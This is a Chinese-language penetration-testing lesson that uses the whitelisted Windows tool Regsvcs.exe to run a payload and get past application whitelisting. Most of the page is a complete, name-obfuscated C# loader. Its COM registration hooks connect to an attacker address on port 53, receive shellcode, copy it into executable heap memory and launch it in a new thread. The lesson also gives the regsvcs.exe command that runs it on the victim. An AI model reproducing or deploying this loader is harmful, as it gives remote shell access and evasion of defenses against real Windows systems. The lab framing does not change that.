第七十四课:基于白名单Regsvcs.exe执行payload第四季

Regsvcs简介:

Regsvcs为.NET服务安装工具,主要提供三类服务:
    加载并注册程序集。
    生成、注册类型库并将其安装到指定的 COM+ 1.0 应用程序中。
    配置以编程方式添加到类的服务。
说明:Regsvcs.exe所在路径没有被系统添加PATH环境变量中,因此,Regsvcs命令无法识别。
基于白名单Regsvcs.exe配置payload:
Windows 7 默认位置:
1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
Copied!
攻击机:192.168.1.4 Debian 靶机:192.168.1.3 Windows 7

配置攻击机msf:

靶机执行:

1
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe Micropoor.dll
Copied!

附录:Micropoor.cs

注:x86 payload
1
using System; using System.Net; using System.Linq; using System.Net.Sockets; using System.Runtime.InteropServices; using System.Threading; using System.EnterpriseServices; using System.Windows.Forms;
2
3
namespace phwUqeuTRSqn
4
5
{
6
7
public class mfBxqerbXgh : ServicedComponent {
8
9
public mfBxqerbXgh() { Console.WriteLine("Micropoor"); }
10
11
[ComRegisterFunction]
12
13
public static void RegisterClass ( string DssjWsFMnwwXL )
14
15
{
16
17
uXsiCEXRzLNkI.BBNSohgZXGCaD();
18
19
}
20
21
[ComUnregisterFunction]
22
23
public static void UnRegisterClass ( string DssjWsFMnwwXL )
24
25
{
26
27
uXsiCEXRzLNkI.BBNSohgZXGCaD();
28
29
}
30
31
}
32
33
public class uXsiCEXRzLNkI
34
35
{ [DllImport("kernel32")] private static extern UInt32 HeapCreate(UInt32 pAyHWx, UInt32 KXNJUcPIUymFNbJ, UInt32 MotkftcMAIJRnW);
36
37
[DllImport("kernel32")] private static extern UInt32 HeapAlloc(UInt32 yjmmncJHBrUu, UInt32 MYjktCDxYrlTs, UInt32 zyBAwQVBQbi);
38
39
[DllImport("kernel32")] private static extern UInt32 RtlMoveMemory(UInt32 PorEiXBhZkA, byte[] UIkcqF, UInt32 wAXQEPCIVJQQb);
40
41
[DllImport("kernel32")] private static extern IntPtr CreateThread(UInt32 WNvQyYv, UInt32 vePRog, UInt32 Bwxjth, IntPtr ExkSdsTdwD, UInt32 KfNaMFOJVTSxbrR, ref UInt32 QEuyYka);
42
43
[DllImport("kernel32")] private static extern UInt32 WaitForSingleObject(IntPtr pzymHg, UInt32 lReJrqjtOqvkXk);static byte[] SVMBrK(string MKwSjIxqTxxEO, int jVaXWRxcmw) {
44
45
IPEndPoint hqbNYMZQr = new IPEndPoint(IPAddress.Parse(MKwSjIxqTxxEO), jVaXWRxcmw);
46
47
Socket LbLgipot = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
48
49
try { LbLgipot.Connect(hqbNYMZQr); }
50
51
catch { return null;}
52
53
byte[] VKQsLPgLmVdp = new byte[4];
54
55
LbLgipot.Receive(VKQsLPgLmVdp, 4, 0);
56
57
int jbQtneZFbvzK = BitConverter.ToInt32(VKQsLPgLmVdp, 0);
58
59
byte[] cyDiPLJhiAQbw = new byte[jbQtneZFbvzK + 5];
60
61
int vyPloXEDJoylLbj = 0;
62
63
while (vyPloXEDJoylLbj < jbQtneZFbvzK)
64
65
{ vyPloXEDJoylLbj += LbLgipot.Receive(cyDiPLJhiAQbw, vyPloXEDJoylLbj + 5, (jbQtneZFbvzK ‐ vyPloXEDJoylLbj) < 4096 ? (jbQtneZFbvzK ‐ vyPloXEDJoylLbj) : 4096, 0);}
66
67
byte[] MkHUcy = BitConverter.GetBytes((int)LbLgipot.Handle);
68
69
Array.Copy(MkHUcy, 0, cyDiPLJhiAQbw, 1, 4); cyDiPLJhiAQbw[0] = 0xBF;
70
71
return cyDiPLJhiAQbw;}
72
73
static void ZFeAPdN(byte[] hjErkNfmkyBq) {
74
75
if (hjErkNfmkyBq != null) {
76
77
UInt32 xYfliOUgksPsv = HeapCreate(0x00040000, (UInt32)hjErkNfmkyBq.Length, 0);
78
79
UInt32 eSiulXLtqQO = HeapAlloc(xYfliOUgksPsv, 0x00000008, (UInt32)hjErkNfmkyBq.Length);
80
81
RtlMoveMemory(eSiulXLtqQO, hjErkNfmkyBq, (UInt32)hjErkNfmkyBq.Length);
82
83
UInt32 NByrFgKjVjB = 0;
84
85
IntPtr PsIqQCvc = CreateThread(0, 0, eSiulXLtqQO, IntPtr.Zero, 0, ref NByrFgKjVjB);
86
87
WaitForSingleObject(PsIqQCvc, 0xFFFFFFFF);}}
88
89
public static void BBNSohgZXGCaD() {
90
91
byte[] cyDiPLJhiAQbw = null; cyDiPLJhiAQbw = SVMBrK("192.168.1.4", 53);
92
93
ZFeAPdN(cyDiPLJhiAQbw);
94
95
} } }
Copied!
Micropoor
Last modified 2yr ago